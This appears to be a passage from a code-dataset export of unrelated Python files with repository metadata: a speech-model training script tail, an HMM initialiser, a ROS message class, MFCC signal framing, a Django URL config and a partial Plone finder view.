logger=logger, gradient_clip_val=1.0,
val_check_interval=args.valid_every,
checkpoint_callback=checkpoint_callback(args),
resume_from_checkpoint=args.resume_from_checkpoint
)
trainer.fit(speech_module)
if __name__ == "__main__":
parser = ArgumentParser()
# distributed training setup
parser.add_argument('-n', '--nodes', default=1, type=int, help='number of data loading workers')
parser.add_argument('-g', '--gpus', default=1, type=int, help='number of gpus per node')
parser.add_argument('-w', '--data_workers', default=0, type=int,
help='n data loading workers, default 0 = main process only')
parser.add_argument('-db', '--dist_backend', default='ddp', type=str,
help='which distributed backend to use. defaul ddp')
# train and valid
parser.add_argument('--train_file', default=None, required=True, type=str,
help='json file to load training data')
parser.add_argument('--valid_file', default=None, required=True, type=str,
help='json file to load testing data')
parser.add_argument('--valid_every', default=1000, required=False, type=int,
help='valid after every N iteration')
# dir and path for models and logs
parser.add_argument('--save_model_path', default=None, required=True, type=str,
help='path to save model')
parser.add_argument('--load_model_from', default=None, required=False, type=str,
help='path to load a pretrain model to continue training')
parser.add_argument('--resume_from_checkpoint', default=None, required=False, type=str,
help='check path to resume from')
parser.add_argument('--logdir', default='tb_logs', required=False, type=str,
help='path to save logs')
# general
parser.add_argument('--epochs', default=10, type=int, help='number of total epochs to run')
parser.add_argument('--batch_size', default=64, type=int, help='size of batch')
parser.add_argument('--learning_rate', default=1e-3, type=float, help='learning rate')
parser.add_argument('--pct_start', default=0.3, type=float, help='percentage of growth phase in one cycle')
parser.add_argument('--div_factor', default=100, type=int, help='div factor for one cycle')
parser.add_argument("--hparams_override", default="{}", type=str, required=False,
help='override the hyper parameters, should be in form of dict. ie. {"attention_layers": 16 }')
parser.add_argument("--dparams_override", default="{}", type=str, required=False,
help='override the data parameters, should be in form of dict. ie. {"sample_rate": 8000 }')
args = parser.parse_args()
args.hparams_override = ast.literal_eval(args.hparams_override)
args.dparams_override = ast.literal_eval(args.dparams_override)
if args.save_model_path:
if not os.path.isdir(os.path.dirname(args.save_model_path)):
raise Exception("the directory for path {} does not exist".format(args.save_model_path))
main(args) | [
"noreply@github.com"
] | rishiraj.noreply@github.com |
cfb080d14c05e5ba70f3611fba5c7802c11373c9 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02882/s256412363.py | 88b565ca18c9c84c582fb7237d25bd5927bd6b85 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | from math import atan,pi
a,b,x=map(int,input().split())
if b-x/a**2 <= x/a**2:print(atan((b-x/a**2)/(a/2))*(180/pi))
else:
y = x/a*2/b
print(atan(b/y)*(180/pi)) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
2fddf29e1c4233369a16715c73ac161b2fbe1826 | 6b13e840d579000a623ab2f5d7463e4cefb18f2d | /initialisation.py | 54ba32bdee035ac8adf1c6b4ed01ac49b0bf4efa | [
"MIT"
] | permissive | RomainSabathe/cw_hmm_expectation_maximization | efd0bdc36acc230aced42c89f9ac7e467ee4d341 | 0822282f05607e8e0e500c039e1b6f7e7a642258 | refs/heads/master | 2021-01-01T05:16:16.943303 | 2016-05-13T19:16:51 | 2016-05-13T19:16:51 | 58,765,060 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,208 | py | import numpy as np
from tools import *
def initialise_parameters(K, N, model='multinomial'):
"""
Initialise parameters (A, B, pi) for a EM of HMM.
K: the number of states the hidden variables can take
N: the number of states the visible variables can take.
model: whether 'multinomial' or 'normal'
"""
A = initialise_A(K)
pi = initialise_pi(K)
if model == 'multinomial':
B = initialise_B(K, N)
return A, B, pi
elif model == 'normal':
E = {}
E['mu'] = np.random.rand(K)
E['sigma2'] = np.random.rand(K)
return A, E, pi
else:
raise Exception('Model unknown')
def initialise_A(K):
"""
See 'initialise_parameters' for usage.
Remainder: A is the transition matrix for the latent variables.
A[i,j] = p(z_t = j | z_t-1 = i)
K: the number of states the hidden variables can take
"""
A = np.matrix(np.zeros([K, K]))
for i in range(K):
A[i,:] = np.random.rand(K)
A[i,:] = normalise(A[i,:]) # the lines must sum to 1 (probability of
# getting *somewhere* starting from i)
return A
def initialise_B(K, N):
"""
See 'initialise_parameters' for usage.
Remainder: B is the estimated posterior probability at time t.
B[i, j] = p(x_t = j | z_t = i)
K: the number of states the hidden variables can take
N: the number of states the visible variables can take
"""
B = np.matrix(np.zeros([K, N]))
for i in range(K):
B[i,:] = np.random.rand(N)
B[i,:] = normalise(B[i,:]) # the lines must sum to 1 (probability of
# observing a visible state if the latent
# variable is i)
return B
def initialise_pi(K):
"""
See 'initialise_parameters' for usage.
Remainder: pi: the initial state distribution. pi(j) = p(z_(t=1) = j)
pi is a column vector.
K: the number of states the hidden variables can take
"""
pi = np.matrix(np.zeros([1, K]))
pi[0,:] = np.random.rand(K)
pi[0,:] = normalise(pi[0,:])
pi = pi.T # is now a column vector
return pi
| [
"RSabathe@gmail.com"
] | RSabathe@gmail.com |
e99a386905b70424a8de735bdb86b29c0631b254 | d4e573e8eae32db155fe5931b3e2dcd3aa48969b | /indigo/lib/python2.7/dist-packages/rocon_std_msgs/srv/_GetPlatformInfo.py | 9632cf90da8b4370fa3f61a096c961f655bcb6dd | [] | no_license | javierdiazp/myros | ee52b0a7c972d559a1a377f8de4eb37878b8a99b | 7571febdfa881872cae6378bf7266deca7901529 | refs/heads/master | 2022-11-09T09:24:47.708988 | 2016-11-10T16:56:28 | 2016-11-10T16:56:28 | 73,733,895 | 0 | 1 | null | 2022-10-25T05:16:35 | 2016-11-14T18:19:06 | C++ | UTF-8 | Python | false | false | 13,022 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from rocon_std_msgs/GetPlatformInfoRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class GetPlatformInfoRequest(genpy.Message):
_md5sum = "d41d8cd98f00b204e9800998ecf8427e"
_type = "rocon_std_msgs/GetPlatformInfoRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """"""
__slots__ = []
_slot_types = []
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(GetPlatformInfoRequest, self).__init__(*args, **kwds)
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from rocon_std_msgs/GetPlatformInfoResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import rocon_std_msgs.msg
class GetPlatformInfoResponse(genpy.Message):
_md5sum = "b7b34c89d857c757ff89bd8e49fa695f"
_type = "rocon_std_msgs/GetPlatformInfoResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """PlatformInfo platform_info
================================================================================
MSG: rocon_std_msgs/PlatformInfo
# Provides platform details for robots, software or human
# interactive devices.
########################### Variables ###########################
# rocon universal resource identifier
string uri
# rocon version compatibility identifier (used when connecting to concerts)
string version
Icon icon
================================================================================
MSG: rocon_std_msgs/Icon
# Used to idenfity the original package/filename resource this icon was/is to be loaded from
# This typically doesn't have to be set, but can be very useful when loading icons from yaml definitions.
string resource_name
# Image data format. "jpeg" or "png"
string format
# Image data.
uint8[] data"""
__slots__ = ['platform_info']
_slot_types = ['rocon_std_msgs/PlatformInfo']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
platform_info
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(GetPlatformInfoResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.platform_info is None:
self.platform_info = rocon_std_msgs.msg.PlatformInfo()
else:
self.platform_info = rocon_std_msgs.msg.PlatformInfo()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self.platform_info.uri
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.version
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.icon.resource_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.icon.format
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.icon.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.platform_info is None:
self.platform_info = rocon_std_msgs.msg.PlatformInfo()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.uri = str[start:end].decode('utf-8')
else:
self.platform_info.uri = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.version = str[start:end].decode('utf-8')
else:
self.platform_info.version = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.icon.resource_name = str[start:end].decode('utf-8')
else:
self.platform_info.icon.resource_name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.icon.format = str[start:end].decode('utf-8')
else:
self.platform_info.icon.format = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
self.platform_info.icon.data = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
  def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module

    All fields of this message are strings/bytes, so the *numpy* module is
    unused here; the signature mirrors the genpy serializer interface.
    Each field is written as a little-endian uint32 length + payload.
    """
    try:
      _x = self.platform_info.uri
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self.platform_info.version
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self.platform_info.icon.resource_name
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self.platform_info.icon.format
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self.platform_info.icon.data
      length = len(_x)
      # - if encoded as a list instead, serialize as bytes instead of string
      if type(_x) in [list, tuple]:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
  def deserialize_numpy(self, str, numpy):
    """
    unpack serialized message in str into this message instance using numpy for array types
    :param str: byte array of serialized message, ``str``
    :param numpy: numpy python module

    This message contains only string/bytes fields, so *numpy* is unused;
    the body is identical to :meth:`deserialize`. Kept separate to match
    the genpy-generated serializer interface.
    """
    try:
      if self.platform_info is None:
        self.platform_info = rocon_std_msgs.msg.PlatformInfo()
      end = 0
      # platform_info.uri: uint32 length prefix + payload bytes
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.platform_info.uri = str[start:end].decode('utf-8')
      else:
        self.platform_info.uri = str[start:end]
      # platform_info.version
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.platform_info.version = str[start:end].decode('utf-8')
      else:
        self.platform_info.version = str[start:end]
      # platform_info.icon.resource_name
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.platform_info.icon.resource_name = str[start:end].decode('utf-8')
      else:
        self.platform_info.icon.resource_name = str[start:end]
      # platform_info.icon.format
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.platform_info.icon.format = str[start:end].decode('utf-8')
      else:
        self.platform_info.icon.format = str[start:end]
      # platform_info.icon.data: raw bytes (uint8[]), never decoded
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      self.platform_info.icon.data = str[start:end]
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
class GetPlatformInfo(object):
  """Service metadata binding the GetPlatformInfo request/response classes."""
  _type = 'rocon_std_msgs/GetPlatformInfo'
  # md5 of the service definition; ROS uses it for interface compatibility checks
  _md5sum = 'b7b34c89d857c757ff89bd8e49fa695f'
  _request_class  = GetPlatformInfoRequest
  _response_class = GetPlatformInfoResponse
| [
"javier.diaz.palacios@gmail.com"
] | javier.diaz.palacios@gmail.com |
989640846f2923672b9f68b26cea48cd3cda4fa1 | f2f7ee6f43966a4741cfadf2c39f1ac0345df6cd | /voice_verification/src/extractors/MFCC/sigproc.py | 5c2d53dd676b47b9f1370dc9129480c6d61a2806 | [
"MIT"
] | permissive | ngocphucck/zalo-ai-challange-2020 | d38963187d417ff6a1f7a561646e363ddb0ad114 | ae454dc4f0a43eac342ddd366f5d6bd1ef88a6eb | refs/heads/main | 2023-07-27T00:27:22.660909 | 2021-09-12T15:23:29 | 2021-09-12T15:23:29 | 356,480,224 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,764 | py | import decimal
import numpy
import math
import logging
import matplotlib.pyplot as plt
from scipy.io import wavfile
def round_half_up(number):
    """Round *number* to the nearest integer, with .5 ties rounded away from zero."""
    quantized = decimal.Decimal(number).quantize(
        decimal.Decimal('1'), rounding=decimal.ROUND_HALF_UP
    )
    return int(quantized)
def rolling_window(a, window, step=1):
    """Return a zero-copy view of overlapping length-*window* windows over the
    last axis of *a*, taking every *step*-th window.
    """
    n_windows = a.shape[-1] - window + 1
    view_shape = a.shape[:-1] + (n_windows, window)
    view_strides = a.strides + (a.strides[-1],)
    windows = numpy.lib.stride_tricks.as_strided(a, shape=view_shape, strides=view_strides)
    return windows[::step]
def frame_signal(signal, frame_len, frame_step, win_func=lambda x: numpy.ones((x,)), stride_trick=True):
    """Split *signal* into overlapping, windowed frames.

    The signal is zero-padded so the last frame is complete; each frame is
    multiplied element-wise by ``win_func(frame_len)``.
    Returns an array of shape (num_frames, frame_len).
    frame_len/frame_step are in samples — TODO confirm against callers,
    which pass small values like 25/15.
    """
    signal_len = len(signal)
    frame_len = int(round_half_up(frame_len))
    frame_step = int(round_half_up(frame_step))
    if signal_len <= frame_len:
        num_frames = 1
    else:
        num_frames = 1 + int(math.ceil((1.0 * signal_len - frame_len) / frame_step))
    # pad with zeros so that exactly num_frames full frames fit
    pad_len = int((num_frames - 1) * frame_step + frame_len)
    zeros = numpy.zeros((pad_len - signal_len,))
    pad_signal = numpy.concatenate((signal, zeros))
    if stride_trick:
        # zero-copy framing via as_strided (see rolling_window)
        win = win_func(frame_len)
        frames = rolling_window(pad_signal, window=frame_len, step=frame_step)
    else:
        # explicit index matrix: row i holds the sample indices of frame i
        indices = numpy.tile(numpy.arange(0, frame_len), (num_frames, 1)) + numpy.tile(
            numpy.arange(0, num_frames * frame_step, frame_step), (frame_len, 1)).T
        indices = numpy.array(indices, dtype=numpy.int32)
        frames = pad_signal[indices]
        win = numpy.tile(win_func(frame_len), (num_frames, 1))
    # broadcasting applies the 1-D window to every frame in the strided case
    return frames * win
def de_frame_signal(frames, signal_len, frame_len, frame_step, win_func=lambda x: numpy.ones((x,))):
    """Overlap-add reconstruction of a signal from its frames (inverse of
    frame_signal), dividing by the summed window to undo the windowing.

    :param signal_len: length to trim the result to; <= 0 means keep the
        full padded length.
    """
    frame_len = round_half_up(frame_len)
    frame_step = round_half_up(frame_step)
    num_frames = numpy.shape(frames)[0]
    # NOTE: assert is stripped under `python -O`; input validation only in debug runs
    assert numpy.shape(frames)[1] == frame_len
    # row i of indices holds the output sample positions of frame i
    indices = numpy.tile(numpy.arange(0, frame_len), (num_frames, 1)) + numpy.tile(
        numpy.arange(0, num_frames * frame_step, frame_step), (frame_len, 1)).T
    indices = numpy.array(indices, dtype=numpy.int32)
    pad_len = (num_frames - 1) * frame_step + frame_len
    if signal_len <= 0:
        signal_len = pad_len
    rec_signal = numpy.zeros((pad_len,))
    window_correction = numpy.zeros((pad_len,))
    win = win_func(frame_len)
    for i in range(0, num_frames):
        window_correction[indices[i, :]] = window_correction[
            indices[i, :]] + win + 1e-15  # add a little bit so it is never zero
        rec_signal[indices[i, :]] = rec_signal[indices[i, :]] + frames[i, :]
    # normalize by the accumulated window energy at each sample
    rec_signal = rec_signal / window_correction
    return rec_signal[0:signal_len]
def mag_spec(frames, fft_len):
    """Magnitude spectrum of each row of *frames* via an fft_len-point real FFT.

    Returns an array of shape (num_frames, fft_len // 2 + 1).
    """
    frame_len = numpy.shape(frames)[1]
    if frame_len > fft_len:
        logging.warning(
            'frame length (%d) is greater than FFT size (%d), frame will be truncated. Increase NFFT to avoid.',
            frame_len, fft_len)
    return numpy.absolute(numpy.fft.rfft(frames, fft_len))
def power_spec(frames, fft_len):
    """Power spectrum of each frame: squared magnitude spectrum scaled by 1/fft_len."""
    magnitude = mag_spec(frames, fft_len)
    return 1.0 / fft_len * numpy.square(magnitude)
def log_power_spec(frames, fft_len, norm=1):
    """Log power spectrum in dB; when *norm* is truthy, shift so the max is 0 dB."""
    spec = power_spec(frames, fft_len)
    spec[spec <= 1e-30] = 1e-30  # floor to keep log10 finite
    log_spec = 10 * numpy.log10(spec)
    if not norm:
        return log_spec
    return log_spec - numpy.max(log_spec)
def pre_emphasis(signal, coefficient=0.95):
    """First-order high-pass pre-emphasis filter: y[n] = x[n] - coefficient * x[n-1].

    The first sample is passed through unchanged.
    """
    emphasized = signal[1:] - coefficient * signal[:-1]
    return numpy.append(signal[0], emphasized)
if __name__ == '__main__':
    # Manual smoke test: frame a local wav file and plot the first frame.
    # NOTE(review): hard-coded absolute path only exists on the author's machine.
    wav_file = '/home/doanphu/Documents/Code/VND_project/zalo-ai-challange-2020/voice_verification/data/808-27.wav'
    sampling_rate, signal = wavfile.read(wav_file)
    print(signal)
    frames = frame_signal(signal, frame_len=25, frame_step=15)
    print(frames)
    plt.plot(frames[0])
    plt.show()
    pass
| [
"doanphucck1801@gmail.com"
] | doanphucck1801@gmail.com |
836952d2e7adb7f62421d15b58c3c91383725b18 | 528585b79edbb5772321bcdeb69c14183d24437e | /driving_school/urls.py | 337da3de9a5f2953b288c29460a4b24772580ce7 | [] | no_license | vatraiadarsh/django-Driving-school | e42f82add756114b9694b0c71add84326ac9ad50 | b71bb8c7949eb9988fdb646ad22fa6c6f5d3c0bc | refs/heads/master | 2020-03-22T08:48:16.157702 | 2018-07-05T03:58:19 | 2018-07-05T03:58:19 | 139,791,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | """driving_school URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
# Project-level URL routes; only the Django admin is exposed.
urlpatterns = [
    path('admin/', admin.site.urls),
]
| [
"vatraiadarsh@gmail.com"
] | vatraiadarsh@gmail.com |
69647f5f6f8dcffab725902e7d5549eb5c8703ee | 53d7cec8fd83072c4fa17200edf5254cc8c2792e | /collective/plonefinder/browser/finder.py | a200db4d81662ff15ecdd509dd437ff38b18542c | [] | no_license | collective/collective.plonefinder | aa95192e9083fcef4674bbfb9ff63bcb7effd6ac | c9a5026b7d1a7307e9ce71dc23aa78a51ceb5740 | refs/heads/master | 2023-08-11T03:31:43.016610 | 2023-02-20T15:58:06 | 2023-02-20T15:58:06 | 10,641,592 | 1 | 7 | null | 2022-10-23T06:25:35 | 2013-06-12T11:34:09 | JavaScript | UTF-8 | Python | false | false | 26,653 | py | # -*- coding: utf-8 -*-
# $Id$
"""Finder pop up control"""
from ZTUtils import make_query
from zope.interface import implementer
from Products.Five import BrowserView
from Acquisition import aq_base, aq_inner
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from Products.CMFCore.utils import getToolByName
from Products.CMFPlone.utils import getFSVersionTuple
from plone.app.layout.navigation.interfaces import INavigationRoot
try:
from Products.ATContentTypes.interface import IATTopic
HAS_AT = True
except ImportError:
HAS_AT = False
from collective.plonefinder.interfaces import IFinder
from collective.plonefinder.browser.interfaces import IFinderUploadCapable
from collective.plonefinder import siteMessageFactory as _
from collective.plonefinder.utils import pleaseDontCache
try:
from plone.app.contenttypes.interfaces import IImage
HAS_PAC = True
except ImportError:
HAS_PAC = False
def _quotestring(s):
return '"%s"' % s
def _quote_bad_chars(s):
bad_chars = ["(", ")"]
for char in bad_chars:
s = s.replace(char, _quotestring(char))
return s
def isPlone3():
    """Return True when the running Plone major version is 3."""
    major_version = getFSVersionTuple()[0]
    return major_version == 3
def getPathClass(browsedpath, currentpath):
    """Return the CSS class for a navigation tree entry.

    ' currentitem' when *currentpath* is the browsed path itself,
    ' currentnode' when it is a strict ancestor (component-wise prefix)
    of the browsed path, '' otherwise.
    """
    if currentpath == browsedpath:
        return ' currentitem'
    browsed_parts = browsedpath.split('/')
    current_parts = currentpath.split('/')
    is_ancestor = (len(browsed_parts) > len(current_parts)
                   and browsed_parts[:len(current_parts)] == current_parts)
    return ' currentnode' if is_ancestor else ''
def finderTopicsQueryCatalog(scope, catalog, **kw):
    """Query *catalog* with the Topic's own criteria, letting **kw override them.

    Unlike the stock AT Topic ``queryCatalog``, a topic without any criteria
    yields no results at all (other use cases are not interesting here).
    """
    query = scope.buildQuery()
    if query is None:
        # topic defines no criteria: return nothing rather than everything
        return []
    # caller-supplied parameters win over the topic's own criteria
    query.update(kw)
    return catalog(**query)
FORM_PARAMS = ('SearchableText',)
@implementer(IFinder)
class Finder(BrowserView):
"""Class for Plone Finder View
"""
template = ViewPageTemplateFile('finder.pt')
    def __init__(self, context, request):
        """Set up default finder configuration; most attributes below can be
        overridden per-request in __call__ or by subclasses."""
        super(Finder, self).__init__(context, request)
        portal_url = getToolByName(context, 'portal_url')
        portal = portal_url.getPortalObject()
        # dict to place persistent objects
        self.data = {
            'portal': portal,
            'root': None,
            'scope': None,
            'catalog': getToolByName(portal, 'portal_catalog')
        }
        self.is_plone3 = isPlone3()
        self.portal_url = portal_url()
        self.portalpath = '/'.join(portal.getPhysicalPath())
        self.breadcrumbs = []
        # All these properties could be overloaded in a Finder's inherited class
        self.findername = 'plone_finder'
        #: Visible breadcrumbs in finder
        self.showbreadcrumbs = True
        self.scopetitle = ''
        self.scopetype = ''
        self.scopeiconclass = 'divicon'
        #: Select multiple elements
        self.multiselect = True
        #: Closes the finder on selecting an item
        self.forcecloseoninsert = 0
        #: Browsing root path
        self.rootpath = ''
        self.browsedpath = ''
        self.parentpath = ''
        self.types = []
        #: View of types in content panel of finder. 'file', 'image' or 'selection'
        self.typeview = 'file'
        self.typecss = 'list'
        #: Enable browsing
        self.browse = True
        self.sort_on = 'getObjPositionInParent'
        self.sort_order = ''
        self.sort_inverse = 'ascending'
        self.sort_request = False
        self.sort_withcatalog = True
        #: When True, list folder contents even without an explicit query or
        #: search submission (see finderQuery) — presumably the usual mode
        self.displaywithoutquery = True
        #: uids of items to be hidden (thus not selectable)
        self.blacklist = []
        self.addtoblacklist = []
        self.removefromblacklist = []
        #: Mapping of catalog query keyword arguments or None
        self.query = None
        # FIXME: We should use an interface instead (IATImage ?)
        #: Portal types that may show image vignettes
        self.imagestypes = ('Image', )
        # FIXME: We should use an interface instead (IIcon ?)
        #: Portal types that may have specific icons
        self.filestypes = ('File',)
        #: Type of returned value, may be 'uid' or 'url'
        self.selectiontype = 'uid'
        #: Do we enable selecting specific image size variants of IATImage items?
        self.allowimagesizeselection = True
        #: Id of the field that has this finder widget
        self.fieldid = 'demofield'
        #: Name of the field that has this finder widget
        self.fieldname = 'demofield'
        #: Type of the field that has this finder widget (FIXME: seems useless)
        self.fieldtype = 'list'
        #: True to show the finder in browser popup, False for an Ajax style overlay
        self.ispopup = True
        #: True to show anyway blacklisted items (but these are not selectable)
        self.showblacklisted = True
        #: True to display the search box
        self.showsearchbox = True
        #: True to display search results
        self.searchsubmit = False
        #: True to allow file upload through the finder
        self.allowupload = True
        #: True to display upload widget by default, only relevant if self.allowupload = True
        self.openuploadwidgetdefault = False
        #: True to allow creating new folders through the finder
        self.allowaddfolder = False
        #: Portal type built to hold object upload through finder UI
        self.typeupload = ''
        #: Portal type built when creating folder through finder UI
        self.typefolder = ''
        # Change this property
        # to define your own methods (overload selectItem as example)
        self.jsaddons = ''
        # Change this property to define your own css
        self.cssaddons = ''
    def __call__(self):
        """Called on view being published.

        Applies request overrides to the finder configuration, resolves the
        browsing scope, computes content/folder results (honouring the
        session-persisted blacklist) and renders the finder template.
        """
        context = aq_inner(self.context)
        request = aq_inner(self.request)
        session = request.get('SESSION', {})
        pleaseDontCache(context, request)
        # Updating attributes from request values
        for name in (
            'rootpath', 'browse', 'showbreadcrumbs', 'multiselect',
            'forcecloseoninsert', 'types', 'typeupload', 'typefolder',
            'typeview', 'displaywithoutquery', 'query', 'imagestypes',
            'filestypes', 'selectiontype', 'allowimagesizeselection', 'fieldid',
            'fieldname', 'fieldtype', 'ispopup', 'showblacklisted',
            'searchsubmit', 'allowupload', 'allowaddfolder'
        ):
            setattr(self, name, request.get(name, getattr(self, name)))
        if not self.browse:
            self.showbreadcrumbs = False
        self.setScopeInfos(context, request, self.showbreadcrumbs)
        if not self.multiselect:
            self.forcecloseoninsert = 1
        if self.typeview == 'image':
            self.typecss = 'float'
        if request.get('finder_sort_on'):
            self.sort_on = request.get('finder_sort_on')
            self.sort_order = request.get('sort_order', self.sort_order)
            # sort_order could be empty or reverse, or ascending
            if self.sort_order=='reverse':
                self.sort_inverse = 'ascending'
            elif self.sort_order=='ascending':
                self.sort_inverse = 'reverse'
            self.sort_request = True
        # fall back to in-Python sorting when the index is unknown to the catalog
        if self.sort_on not in self.data['catalog'].indexes():
            self.sort_withcatalog = False
        # Use self.blacklist (or blacklist in session or request) to remove some
        # uids from results
